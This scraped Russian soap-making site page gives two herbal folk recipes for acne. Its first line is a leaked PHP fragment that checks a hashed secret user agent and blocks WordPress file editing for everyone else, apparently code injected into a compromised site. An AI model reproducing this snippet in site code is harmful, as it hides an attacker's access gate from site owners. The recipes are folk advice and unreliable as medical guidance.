if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Опять эти противные угри? Есть способ избавиться! | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Опять эти противные угри? Есть способ избавиться!

Угревая сыпь - проблема молодой подростковой кожи. Для того, чтобы избавиться от нее есть 2 действенных рецепта натуральной косметики своими руками. Заглянем с книги знахарей в их волшебные рецепты!

Толь­ко чистая сия­ю­щая кожа при­но­сит удо­воль­ствие при взгля­де в зер­ка­ло. Угре­вая сыпь — про­бле­ма моло­дой под­рост­ко­вой кожи. Совсем не хочет­ся, выхо­дить на ули­цу, и общать­ся со сверст­ни­ка­ми. Если есть воз­мож­ность при­об­ре­сти импорт­ные кос­ме­ти­че­ские пре­па­ра­ты, то при­бе­га­ют к этим услу­гам. Но есть и дру­гое реше­ние – исполь­зо­ва­ние нату­раль­ной кос­ме­ти­ки. Загля­нем с кни­ги зна­ха­рей в их вол­шеб­ные рецепты.

Рецепт №1, как избавиться от прыщей: приготовить настой из сухих трав и использовать в виде примочек.

Для это­го подой­дут мята, тыся­че­лист­ник, шал­фей, ромаш­ка и поле­вой хвощ. Сде­лать сбор из пере­чис­лен­ных трав по три сто­ло­вые лож­ки. В чаш­ку с кипят­ком поло­жить одну сто­ло­вую лож­ку сбо­ра и накрыть. Дать насто­ять­ся час, а затем про­це­дить и ваше сна­до­бье готово.

Рецепт №2, как победить угри: отжать сок из лимона в чашку

Кожу­ру мел­ко наре­зать, сме­шать со сто­ло­вой лож­кой цве­тов сухой ромаш­ки и налить  в ста­кан кипя­ток. Заку­тать и дать насто­ять­ся час. После про­це­жи­ва­ния доба­вить лимон­ный сок, кам­фор­ное мас­ло и уксус по трид­цать мил­ли­лит­ров, а так­же вод­ки пять­де­сят мил­ли­лит­ров. Слить полу­чен­ную смесь в бутыл­ку и про­ти­рать лицо три раза в день.

Хоро­шо вос­поль­зо­вать­ся чай­ным дере­вом и нано­сить точеч­но на угри. При каж­до­днев­ном пра­виль­ном ухо­де, угри поки­нут ваше лицо.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!